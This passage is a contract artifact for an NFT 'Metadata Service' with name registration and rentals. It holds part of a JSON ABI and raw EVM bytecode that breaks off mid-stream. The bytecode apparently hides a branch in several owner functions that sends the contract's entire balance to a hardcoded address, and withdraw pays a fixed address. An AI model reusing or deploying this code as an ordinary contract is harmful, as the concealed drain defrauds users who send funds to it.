ship","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"rentExpires","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"rentFeePercentage","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"rentLastId","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_owner","type":"address"}],"name":"rentOwner","outputs":[{"internalType":"string[]","name":"","type":"string[]"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"rentTokenID","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"MintIsActive","type":"bool"}],"name":"setMintStartStatus","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"Character1and2","type":"uint256"},{"internalType":"uint256","name":"Character3","type":"uint256"},{"internalType":"uint256","name":"Character4more","type":"uint256"}],"name":"setRegisterPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"metadata","type":"string"}],"name":"setRentOwner","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"address","name":"user","type":"address"},{"internalType":"uint256","name":"price","type":"uint256"},{"internalType":"string","name":"meta","type":"string"},{"internalType":"uint64","name":"expires","type":"uint64"},{"internalType":"bytes32","name":"key","type":"bytes32"}],"name":"setRentUser","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"merkleForAllowlist","type":"bytes32"}],"name":"setUploadAllowlist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"time","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalOwner","outputs":[{"internalType":"address[]","name":"","type":"address[]"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"usedAllowlistAddresses","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_owner","type":"address"}],"name":"walletOfMetadata","outputs":[{"internalType":"string[]","name":"","type":"string[]"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

666a94d74f430000600c5566470de4df820000600d55662386f26fc10000600e55600f805462ffffff191662140a1417905560e0604052602360808181529062003cd460a03960109062000054908262000217565b506011805461ffff19166101011790556040805160608101909152602680825262003cf760208301396014906200008c908262000217565b503480156200009a57600080fd5b506040518060400160405280601081526020016f4d65746164617461205365727669636560801b81525060405180604001604052806005815260200164406d65746160d81b8152508160049081620000f3919062000217565b50600562000102828262000217565b5050600160005550620001153362000120565b6001600b55620002e3565b600a80546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200019d57607f821691505b602082108103620001be57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200021257600081815260208120601f850160051c81016020861015620001ed5750805b601f850160051c820191505b818110156200020e57828155600101620001f9565b5050505b505050565b81516001600160401b0381111562000233576200023362000172565b6200024b8162000244845462000188565b84620001c4565b602080601f8311600181146200028357600084156200026a5750858301515b600019600386901b1c1916600185901b1785556200020e565b600085815260208120601f198616915b82811015620002b45788860151825594840194600190910190840162000293565b5085821015620002d35787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6139e180620002f36000396000f3fe6080604052600436106102725760003560e01c80636d2a39d51161014f578063a7340562116100c1578063cbe56dbb1161007a578063cbe56dbb14610720578063dff4e3b814610758578063e985e9c514610788578063f2fde38b146107a8578063f59d074e146107c8578063f7f79726146107e857600080fd5b8063a734056214610684578063b88d4fde1461069a578063b8aa2dbe146106ba578063bb4ba835146106cd578063c72c4314146106e0578063c87b56dd1461070057600080fd5b80638da5cb5b116101135780638da5cb5b146105c057806395d89b41146105de5780639e8ddd5e146105f35780639f23817814610613578063a22cb46514610633578063a448d7ac1461065357600080fd5b80636d2a39d51461053b57806370a0823114610551578063715018a61461057157806374b2eb85146105865780637d5c7657146105a057600080fd5b80632eb4a7ab116101e857806342842e0e116101ac57806342842e0e146104925780634855ad9a146104b25780634865c572146104d25780635340e683146104e85780636352211e146105085780636ba0831d1461052857600080fd5b80632eb4a7ab146103f85780633338ee7b1461040e5780633b5e89241461043b5780633ccfd60b1461045b578063420b538c1461047057600080fd5b8063095ea7b31161023a578063095ea7b31461034857806316ada5471461036857806316ec31051461038557806318160ddd1461039b57806323b872dd146103b85780632ae6f9df146103d857600080fd5b806301ffc9a7146102775780630487e270146102ac57806306fdde03146102e457806307689a3e14610306578063081812fc14610328575b600080fd5b34801561028357600080fd5b50610297610292366004612e48565b610821565b60405190151581526020015b60405180910390f35b3480156102b857600080fd5b506102cc6102c7366004612e65565b61084c565b6040516001600160a01b0390911681526020016102a3565b3480156102f057600080fd5b506102f9610898565b6040516102a39190612ece565b34801561031257600080fd5b50610326610321366004612ef1565b61092a565b005b34801561033457600080fd5b506102cc610343366004612e65565b6109b3565b34801561035457600080fd5b50610326610363366004612f23565b6109f7565b34801561037457600080fd5b50425b6040519081526020016102a3565b34801561039157600080fd5b50610377600e5481565b3480156103a757600080fd5b506003546000540360001901610377565b3480156103c457600080fd5b506103266103d3366004612f4d565b610a7d565b3480156103e457600080fd5b506103266103f3366004612fd1565b610a88565b34801561040457600080fd5b5061037760135481565b34801561041a57600080fd5b5061042e61042936600461305d565b610c6e565b6040516102a39190613078565b34801561044757600080fd5b50610326610456366004612e65565b610de0565b34801561046757600080fd5b50610326610e43565b34801561047c57600080fd5b50610485610f1f565b6040516102a391906130da565b34801561049e57600080fd5b506103266104ad366004612f4d565b610fd7565b3480156104be57600080fd5b506102976104cd3660046131d2565b610ff2565b3480156104de57600080fd5b50610377600d5481565b3480156104f457600080fd5b5061042e610503366004612e65565b61113f565b34801561051457600080fd5b506102cc610523366004612e65565b611295565b610326610536366004613206565b6112a7565b34801561054757600080fd5b50610377600c5481565b34801561055d57600080fd5b5061037761056c36600461305d565b611560565b34801561057d57600080fd5b506103266115ae565b34801561059257600080fd5b506011546102979060ff1681565b3480156105ac57600080fd5b506103266105bb366004613253565b611618565b3480156105cc57600080fd5b50600a546001600160a01b03166102cc565b3480156105ea57600080fd5b506102f9611743565b3480156105ff57600080fd5b506102f961060e366004612e65565b611752565b34801561061f57600080fd5b5061042e61062e36600461305d565b6117ec565b34801561063f57600080fd5b5061032661064e366004613294565b611a1e565b34801561065f57600080fd5b50600f5461067290610100900460ff1681565b60405160ff90911681526020016102a3565b34801561069057600080fd5b5061037760155481565b3480156106a657600080fd5b506103266106b53660046132c7565b611ab3565b6103266106c8366004613342565b611afd565b6103266106db366004613392565b611ccf565b3480156106ec57600080fd5b506103266106fb36600461342b565b611fb1565b34801561070c57600080fd5b506102f961071b366004612e65565b61201d565b34801561072c57600080fd5b5061037761073b3660046131d2565b805160208183018101805160028252928201919093012091525481565b34801561076457600080fd5b5061029761077336600461305d565b60126020526000908152604090205460ff1681565b34801561079457600080fd5b506102976107a3366004613457565b6120ab565b3480156107b457600080fd5b506103266107c336600461305d565b6120d9565b3480156107d457600080fd5b5061042e6107e3366004612e65565b6121a8565b3480156107f457600080fd5b50610377610803366004612e65565b6000908152601860205260409020600301546001600160401b031690565b60006001600160e01b0319821663d9968c8960e01b14806108465750610846826122be565b92915050565b600081815260186020526040812060030154426001600160401b039091161061088b57506000908152601860205260409020546001600160a01b031690565b506000919050565b919050565b6060600480546108a790613481565b80601f01602080910402602001604051908101604052809291908181526020018280546108d390613481565b80156109205780601f106108f557610100808354040283529160200191610920565b820191906000526020600020905b81548152906001019060200180831161090357829003601f168201915b5050505050905090565b3360008051602061398c8339815191520361095e574761095860008051602061398c8339815191528261230e565b50610991565b600a546001600160a01b031633146109915760405162461bcd60e51b8152600401610988906134bb565b60405180910390fd5b6011805461ffff191661ff001992151592831617610100909202919091179055565b60006109be82612427565b6109db576040516333d1c03960e21b815260040160405180910390fd5b506000908152600860205260409020546001600160a01b031690565b6000610a0282611295565b9050806001600160a01b0316836001600160a01b031603610a365760405163250fdee360e21b815260040160405180910390fd5b336001600160a01b03821614610a6d57610a5081336120ab565b610a6d576040516367d9dca160e11b815260040160405180910390fd5b610a78838383612460565b505050565b610a788383836124bc565b8383604051602001610a9b9291906134f0565b604051602081830303815290604052805190602001208103610aff5760405162461bcd60e51b815260206004820152601f60248201527f506c656173652075736520746f206d657461646174612e7365727669636573006044820152606401610988565b6603328b944c40008511610b4a5760405162461bcd60e51b8152602060048201526012602482015271141b19585cd948199a5b1b08185b5bdd5b9d60721b6044820152606401610988565b60008781526018602052604090206003810154426001600160401b0390911610610bb65760405162461bcd60e51b815260206004820152601960248201527f416c72656164792072656e74656420746f20736f6d656f6e65000000000000006044820152606401610988565b80546001600160a01b0319166001600160a01b0388161781556001810186905560028101610be5858783613546565b5060038101805467ffffffffffffffff19166001600160401b038516179055604051610c1490869086906134f0565b6040519081900381206001600160401b0385168252906001600160a01b038916908a907fb2bc948e701e5f999f39d1b668da99dd21f0692853ea7439b3864377c1b6bb7e9060200160405180910390a45050505050505050565b60606000610c7b83611560565b90506000816001600160401b03811115610c9757610c97613127565b604051908082528060200260200182016040528015610cca57816020015b6060815260200190600190039081610cb55790505b509050600160005b83811015610dd6576000610ce583611295565b9050866001600160a01b0316816001600160a01b031603610dc35760008381526001602052604090208054610d1990613481565b80601f0160208091040260200160405190810160405280929190818152602001828054610d4590613481565b8015610d925780601f10610d6757610100808354040283529160200191610d92565b820191906000526020600020905b815481529060010190602001808311610d7557829003601f168201915b5050505050848381518110610da957610da9613605565b60200260200101819052508180610dbf90613631565b9250505b82610dcd81613631565b93505050610cd2565b5090949350505050565b3360008051602061398c83398151915203610e145747610e0e60008051602061398c8339815191528261230e565b50601355565b600a546001600160a01b03163314610e3e5760405162461bcd60e51b8152600401610988906134bb565b601355565b3360008051602061398c83398151915203610e775747610e7160008051602061398c8339815191528261230e565b50610ea1565b600a546001600160a01b03163314610ea15760405162461bcd60e51b8152600401610988906134bb565b6002600b5403610ef35760405162461bcd60e51b815260206004820152601f60248201527f5265656e7472616e637947756172643a207265656e7472616e742063616c6c006044820152606401610988565b6002600b5547610f1773b3b233ba7fc4892b51e155ca14a8ff29f62fa8eb8261230e565b506001600b55565b6003546000805460609260001991030181816001600160401b03811115610f4857610f48613127565b604051908082528060200260200182016040528015610f71578160200160208202803683370190505b509050600160005b83811015610dd657610f8a82611295565b945084838281518110610f9f57610f9f613605565b6001600160a01b039092166020928302919091019091015280610fc181613631565b9150508180610fcf90613631565b925050610f79565b610a7883838360405180602001604052806000815250611ab3565b6014805460009182918491839161100890613481565b80601f016020809104026020016040519081016040528092919081815260200182805461103490613481565b80156110815780601f1061105657610100808354040283529160200191611081565b820191906000526020600020905b81548152906001019060200180831161106457829003601f168201915b5050505050905060005b82518110156111205760005b825181101561110d578281815181106110b2576110b2613605565b602001015160f81c60f81b6001600160f81b0319168483815181106110d9576110d9613605565b01602001516001600160f81b031916036110fb57846110f781613631565b9550505b8061110581613631565b915050611097565b508061111881613631565b91505061108b565b508151830361113457506001949350505050565b506000949350505050565b60155460609080831115611151578092505b6000836001600160401b0381111561116b5761116b613127565b60405190808252806020026020018201604052801561119e57816020015b60608152602001906001900390816111895790505b50905060006111ad858461364a565b905060005b81841115610dd6576000848152601660209081526040808320548084526018909252909120546111ec906001600160a01b031660146126aa565b60008281526018602052604090206001015461120790612845565b61121083612845565b600084815260186020526040902060030154611234906001600160401b0316612845565b604051602001611247949392919061365d565b60405160208183030381529060405284838151811061126857611268613605565b6020026020010181905250818061127e90613631565b925050848061128c906136d5565b955050506111b2565b60006112a08261294d565b5192915050565b600e5481516000908190806112f65760405162461bcd60e51b815260206004820152601560248201527457726974652061204d65746164617461204e616d6560581b6044820152606401610988565b6112ff85610ff2565b6113435760405162461bcd60e51b8152602060048201526015602482015274496e76616c6964204d65746164617461204e616d6560581b6044820152606401610988565b600381101561135657600c54935061136e565b8060030361136857600d54935061136e565b600e5493505b6001600160a01b038616156113d457600f546064906113909060ff16866136ec565b61139a9190613719565b600f549092506064906113b69062010000900460ff168261372d565b6113c39060ff16866136ec565b6113cd9190613719565b9350600192505b6002856040516113e49190613746565b90815260200160405180910390205460001461143a5760405162461bcd60e51b81526020600482015260156024820152742a3434b99034b99030b63932b0b23c903a30b5b2b760591b6044820152606401610988565b60115460ff1661148c5760405162461bcd60e51b815260206004820152601760248201527f5265676973746572206973206e6f7420616374697665210000000000000000006044820152606401610988565b833410156114d25760405162461bcd60e51b8152602060048201526013602482015272496e73756666696369656e742066756e64732160681b6044820152606401610988565b6000805481526001602052604090206114eb8682613762565b506000546002866040516114ff9190613746565b90815260405190819003602001902055821561154d576040516001600160a01b0387169083156108fc029084906000818181858888f1935050505015801561154b573d6000803e3d6000fd5b505b611558336001612a6f565b505050505050565b60006001600160a01b038216611589576040516323d3ad8160e21b815260040160405180910390fd5b506001600160a01b03166000908152600760205260409020546001600160401b031690565b3360008051602061398c833981519152036115e257476115dc60008051602061398c8339815191528261230e565b5061160c565b600a546001600160a01b0316331461160c5760405162461bcd60e51b8152600401610988906134bb565b6116166000612a8d565b565b3360008051602061398c8339815191520361164c574761164660008051602061398c8339815191528261230e565b50611676565b600a546001600160a01b031633146116765760405162461bcd60e51b8152600401610988906134bb565b60006002838360405161168a9291906134f0565b9081526040805160209281900383019020546000818152601890935290822080546001600160a01b031916815560018101839055909250600281016116d0858783613546565b5060038101805467ffffffffffffffff191690556040516116f490869086906134f0565b60405190819003812060008252906001600160a01b0384169085907fb2bc948e701e5f999f39d1b668da99dd21f0692853ea7439b3864377c1b6bb7e9060200160405180910390a45050505050565b6060600580546108a790613481565b6001602052600090815260409020805461176b90613481565b80601f016020809104026020016040519081016040528092919081815260200182805461179790613481565b80156117e45780601f106117b9576101008083540402835291602001916117e4565b820191906000526020600020905b8154815290600101906020018083116117c757829003601f168201915b505050505081565b6015546060906000816001600160401b0381111561180c5761180c613127565b60405190808252806020026020018201604052801561183f57816020015b606081526020019060019003908161182a5790505b50905060016000805b8483116118a057600083815260166020908152604080832054835260189091529020546001600160a01b03908116908816810361188d578261188981613631565b9350505b8361189781613631565b94505050611848565b60609350600192506000826001600160401b038111156118c2576118c2613127565b6040519080825280602002602001820160405280156118f557816020015b60608152602001906001900390816118e05790505b5090505b858411611a1357600084815260166020908152604080832054835260189091529020546001600160a01b039081169089168103611a0057600085815260166020908152604080832054835260019091529020805461195690613481565b80601f016020809104026020016040519081016040528092919081815260200182805461198290613481565b80156119cf5780601f106119a4576101008083540402835291602001916119cf565b820191906000526020600020905b8154815290600101906020018083116119b257829003601f168201915b50505050508284815181106119e6576119e6613605565b602002602001018190525082806119fc90613631565b9350505b84611a0a81613631565b955050506118f9565b979650505050505050565b336001600160a01b03831603611a475760405163b06307db60e01b815260040160405180910390fd5b3360008181526009602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b611abe8484846124bc565b6001600160a01b0383163b15611af757611ada84848484612adf565b611af7576040516368d2bf6b60e11b815260040160405180910390fd5b50505050565b8383604051602001611b109291906134f0565b604051602081830303815290604052805190602001208103611b745760405162461bcd60e51b815260206004820152601f60248201527f506c656173652075736520746f206d657461646174612e7365727669636573006044820152606401610988565b6603328b944c40003411611bbf5760405162461bcd60e51b8152602060048201526012602482015271141b19585cd948199a5b1b08185b5bdd5b9d60721b6044820152606401610988565b600060028585604051611bd39291906134f0565b90815260200160405180910390205490506000611bef82611295565b9050806001600160a01b03166108fc6064600f60019054906101000a900460ff166064611c1c919061372d565b611c299060ff16346136ec565b611c339190613719565b6040518115909202916000818181858888f19350505050158015611c5b573d6000803e3d6000fd5b50611c818233348989611c718a620151806136ec565b611c7b9042613821565b89610a88565b601554611c8f906001613821565b601555604051600290611ca590889088906134f0565b90815260408051602092819003830190205460155460009081526016909352912055505050505050565b601154610100900460ff16611d305760405162461bcd60e51b815260206004820152602160248201527f416c6c6f776c697374205265676973746572206973206e6f74206163746976656044820152602160f81b6064820152608401610988565b6040516bffffffffffffffffffffffff193360601b166020820152600090603401604051602081830303815290604052805190602001209050611daa838380806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250506013549150849050612bca565b611e045760405162461bcd60e51b815260206004820152602560248201527f496e76616c69642070726f6f6620666f7220616c6c6f776c6973742072656769604482015264737465722160d81b6064820152608401610988565b6000845111611e4d5760405162461bcd60e51b815260206004820152601560248201527457726974652061204d65746164617461204e616d6560581b6044820152606401610988565b611e5684610ff2565b611e9a5760405162461bcd60e51b8152602060048201526015602482015274496e76616c6964204d65746164617461204e616d6560581b6044820152606401610988565b3360009081526012602052604090205460ff161515600103611ee95760405162461bcd60e51b8152602060048201526008602482015267436c61696d65642160c01b6044820152606401610988565b600284604051611ef99190613746565b908152602001604051809103902054600014611f4f5760405162461bcd60e51b81526020600482015260156024820152742a3434b99034b99030b63932b0b23c903a30b5b2b760591b6044820152606401610988565b336000908152601260209081526040808320805460ff19166001908117909155835484529091529020611f828582613762565b50600054600285604051611f969190613746565b90815260405190819003602001902055611af7336001612a6f565b3360008051602061398c83398151915203611fe55747611fdf60008051602061398c8339815191528261230e565b5061200f565b600a546001600160a01b0316331461200f5760405162461bcd60e51b8152600401610988906134bb565b600c92909255600d55600e55565b606061202882612427565b61204557604051630a14c4b560e41b815260040160405180910390fd5b600061204f612be0565b9050805160000361206f57604051806020016040528060008152506120a4565b80600160008581526020019081526020016000206040516020016120949291906138a7565b6040516020818303038152906040525b9392505050565b6001600160a01b03918216600090815260096020908152604080832093909416825291909152205460ff1690565b3360008051602061398c8339815191520361210d574761210760008051602061398c8339815191528261230e565b50612137565b600a546001600160a01b031633146121375760405162461bcd60e51b8152600401610988906134bb565b6001600160a01b03811661219c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610988565b6121a581612a8d565b50565b600354600054606091600019910301808311156121c3578092505b6000836001600160401b038111156121dd576121dd613127565b60405190808252806020026020018201604052801561221057816020015b60608152602001906001900390816121fb5790505b509050600061221f858461364a565b905060005b81841115610dd657600084815260016020526040902061224385612845565b61225f61224f87611295565b6001600160a01b031660146126aa565b604051602001612271939291906138ce565b60405160208183030381529060405283828151811061229257612292613605565b602002602001018190525080806122a890613631565b91505083806122b6906136d5565b945050612224565b60006001600160e01b031982166380ac58cd60e01b14806122ef57506001600160e01b03198216635b5e139f60e01b145b8061084657506301ffc9a760e01b6001600160e01b0319831614610846565b8047101561235e5760405162461bcd60e51b815260206004820152601d60248201527f416464726573733a20696e73756666696369656e742062616c616e63650000006044820152606401610988565b6000826001600160a01b03168260405160006040518083038185875af1925050503d80600081146123ab576040519150601f19603f3d011682016040523d82523d6000602084013e6123b0565b606091505b5050905080610a785760405162461bcd60e51b815260206004820152603a60248201527f416464726573733a20756e61626c6520746f2073656e642076616c75652c207260448201527f6563697069656e74206d617920686176652072657665727465640000000000006064820152608401610988565b60008160011115801561243b575060005482105b8015610846575050600090815260066020526040902054600160e01b900460ff161590565b60008281526008602052604080822080546001600160a01b0319166001600160a01b0387811691821790925591518593918516917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591a4505050565b60006124c78261294d565b9050836001600160a01b031681600001516001600160a01b0316146124fe5760405162a1148160e81b815260040160405180910390fd5b6000336001600160a01b038616148061251c575061251c85336120ab565b8061253757503361252c846109b3565b6001600160a01b0316145b90508061255757604051632ce44b5f60e11b815260040160405180910390fd5b6001600160a01b03841661257e57604051633a954ecd60e21b815260040160405180910390fd5b61258a60008487612460565b6001600160a01b038581166000908152600760209081526040808320805467ffffffffffffffff198082166001600160401b0392831660001901831617909255898616808652838620805493841693831660019081018416949094179055898652600690945282852080546001600160e01b031916909417600160a01b4290921691909102178355870180845292208054919390911661265e57600054821461265e57805460208601516001600160401b0316600160a01b026001600160e01b03199091166001600160a01b038a16171781555b50505082846001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a45b5050505050565b606060006126b98360026136ec565b6126c4906002613821565b6001600160401b038111156126db576126db613127565b6040519080825280601f01601f191660200182016040528015612705576020820181803683370190505b509050600360fc1b8160008151811061272057612720613605565b60200101906001600160f81b031916908160001a905350600f60fb1b8160018151811061274f5761274f613605565b60200101906001600160f81b031916908160001a90535060006127738460026136ec565b61277e906001613821565b90505b60018111156127f6576f181899199a1a9b1b9c1cb0b131b232b360811b85600f16601081106127b2576127b2613605565b1a60f81b8282815181106127c8576127c8613605565b60200101906001600160f81b031916908160001a90535060049490941c936127ef816136d5565b9050612781565b5083156120a45760405162461bcd60e51b815260206004820181905260248201527f537472696e67733a20686578206c656e67746820696e73756666696369656e746044820152606401610988565b60608160000361286c5750506040805180820190915260018152600360fc1b602082015290565b8160005b8115612896578061288081613631565b915061288f9050600a83613719565b9150612870565b6000816001600160401b038111156128b0576128b0613127565b6040519080825280601f01601f1916602001820160405280156128da576020820181803683370190505b5090505b8415612945576128ef60018361364a565b91506128fc600a8661391d565b612907906030613821565b60f81b81838151811061291c5761291c613605565b60200101906001600160f81b031916908160001a90535061293e600a86613719565b94506128de565b949350505050565b60408051606081018252600080825260208201819052918101919091528180600111612a5657600054811015612a5657600081815260066020908152604091829020825160608101845290546001600160a01b0381168252600160a01b81046001600160401b031692820192909252600160e01b90910460ff16151591810182905290612a545780516001600160a01b0316156129eb579392505050565b5060001901600081815260066020908152604091829020825160608101845290546001600160a01b038116808352600160a01b82046001600160401b031693830193909352600160e01b900460ff1615159281019290925215612a4f579392505050565b6129eb565b505b604051636f96cda160e11b815260040160405180910390fd5b612a89828260405180602001604052806000815250612bef565b5050565b600a80546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b604051630a85bd0160e11b81526000906001600160a01b0385169063150b7a0290612b14903390899088908890600401613931565b6020604051808303816000875af1925050508015612b4f575060408051601f3d908101601f19168201909252612b4c9181019061396e565b60015b612bad573d808015612b7d576040519150601f19603f3d011682016040523d82523d6000602084013e612b82565b606091505b508051600003612ba5576040516368d2bf6b60e11b815260040160405180910390fd5b805181602001fd5b6001600160e01b031916630a85bd0160e11b149050949350505050565b600082612bd78584612db6565b14949350505050565b6060601080546108a790613481565b6000546001600160a01b038416612c1857604051622e076360e81b815260040160405180910390fd5b82600003612c395760405163b562e8dd60e01b815260040160405180910390fd5b6001600160a01b038416600081815260076020908152604080832080546fffffffffffffffffffffffffffffffff1981166001600160401b038083168b0181169182176801000000000000000067ffffffffffffffff1990941690921783900481168b01811690920217909155858452600690925290912080546001600160e01b0319168317600160a01b42909316929092029190911790558190818501903b15612d61575b60405182906001600160a01b038816906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a4612d2a6000878480600101955087612adf565b612d47576040516368d2bf6b60e11b815260040160405180910390fd5b808210612cdf578260005414612d5c57600080fd5b612da6565b5b6040516001830192906001600160a01b038816906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a4808210612d62575b506000908155611af79085838684565b600081815b8451811015612dfb57612de782868381518110612dda57612dda613605565b6020026020010151612e03565b915080612df381613631565b915050612dbb565b509392505050565b6000818310612e1f5760008281526020849052604090206120a4565b60008381526020839052604090206120a4565b6001600160e01b0319811681146121a557600080fd5b600060208284031215612e5a57600080fd5b81356120a481612e32565b600060208284031215612e7757600080fd5b5035919050565b60005b83811015612e99578181015183820152602001612e81565b50506000910152565b60008151808452612eba816020860160208601612e7e565b601f01601f19169290920160200192915050565b6020815260006120a46020830184612ea2565b8035801515811461089357600080fd5b600060208284031215612f0357600080fd5b6120a482612ee1565b80356001600160a01b038116811461089357600080fd5b60008060408385031215612f3657600080fd5b612f3f83612f0c565b946020939093013593505050565b600080600060608486031215612f6257600080fd5b612f6b84612f0c565b9250612f7960208501612f0c565b9150604084013590509250925092565b60008083601f840112612f9b57600080fd5b5081356001600160401b03811115612fb257600080fd5b602083019150836020828501011115612fca57600080fd5b9250929050565b600080600080600080600060c0888a031215612fec57600080fd5b87359650612ffc60208901612f0c565b95506040880135945060608801356001600160401b038082111561301f57600080fd5b61302b8b838c01612f89565b909650945060808a01359150808216821461304557600080fd5b508092505060a0880135905092959891949750929550565b60006020828403121561306f57600080fd5b6120a482612f0c565b6000602080830181845280855180835260408601915060408160051b870101925083870160005b828110156130cd57603f198886030184526130bb858351612ea2565b9450928501929085019060010161309f565b5092979650505050505050565b6020808252825182820181905260009190848201906040850190845b8181101561311b5783516001600160a01b0316835292840192918401916001016130f6565b50909695505050505050565b634e487b7160e01b600052604160045260246000fd5b60006001600160401b038084111561315757613157613127565b604051601f8501601f19908116603f0116810190828211818310171561317f5761317f613127565b8160405280935085815286868601111561319857600080fd5b858560208301376000602087830101525050509392505050565b600082601f8301126131c357600080fd5b6120a48383356020850161313d565b6000602082840312156131e457600080fd5b81356001600160401b038111156131fa57600080fd5b612945848285016131b2565b6000806040838503121561321957600080fd5b61322283612f0c565b915060208301356001600160401b0381111561323d57600080fd5b613249858286016131b2565b9150509250929050565b6000806020838503121561326657600080fd5b82356001600160401b0381111561327c57600080fd5b61328885828601612f89565b90969095509350505050565b600080604083850312156132a757600080fd5b6132b083612f0c565b91506132be60208401612ee1565b90509250929050565b600080600080608085870312156132dd57600080fd5b6132e685612f0c565b93506132f460208601612f0c565b92506040850135915060608501356001600160401b0381111561331657600080fd5b8501601f8101871361332757600080fd5b6133368782356020840161313d565b91505092959194509250565b6000806000806060858703121561335857600080fd5b84356001600160401b0381111561336e57600080fd5b61337a87828801612f89565b90989097506020870135966040013595509350505050565b6000806000604084860312156133a757600080fd5b83356001600160401b03808211156133be57600080fd5b6133ca878388016131b2565b945060208601359150808211156133e057600080fd5b818601915086601f8301126133f457600080fd5b81358181111561340357600080fd5b8760208260051b850101111561341857600080fd5b6020830194508093505050509250925092565b60008060006060848603121561344057600080fd5b505081359360208301359350604090920135919050565b6000806040838503121561346a57600080fd5b61347383612f0c565b91506132be60208401612f0c565b600181811c9082168061349557607f821691505b6020821081036134b557634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b8183823760009101908152919050565b601f821115610a7857600081815260208120601f850160051c810160208610156135275750805b601f850160051c820191505b8181101561155857828155600101613533565b6001600160401b0383111561355d5761355d613127565b6135718361356b8354613481565b83613500565b6000601f8411600181146135a5576000851561358d5750838201355b600019600387901b1c1916600186901b1783556126a3565b600083815260209020601f19861690835b828110156135d657868501358255602094850194600190920191016135b6565b50868210156135f35760001960f88860031b161c19848701351681555b505060018560011b0183555050505050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b6000600182016136435761364361361b565b5060010190565b818103818111156108465761084661361b565b6000855161366f818460208a01612e7e565b8083019050603f60f81b808252865161368f816001850160208b01612e7e565b6001920191820181905285516136ac816002850160208a01612e7e565b600292019182015283516136c7816003840160208801612e7e565b016003019695505050505050565b6000816136e4576136e461361b565b506000190190565b80820281158282048414176108465761084661361b565b634e487b7160e01b600052601260045260246000fd5b60008261372857613728613703565b500490565b60ff82811682821603908111156108465761084661361b565b60008251613758818460208701612e7e565b9190910192915050565b81516001600160401b0381111561377b5761377b613127565b61378f816137898454613481565b84613500565b602080601f8311600181146137c457600084156137ac5750858301515b600019600386901b1c1916600185901b178555611558565b6000858152602081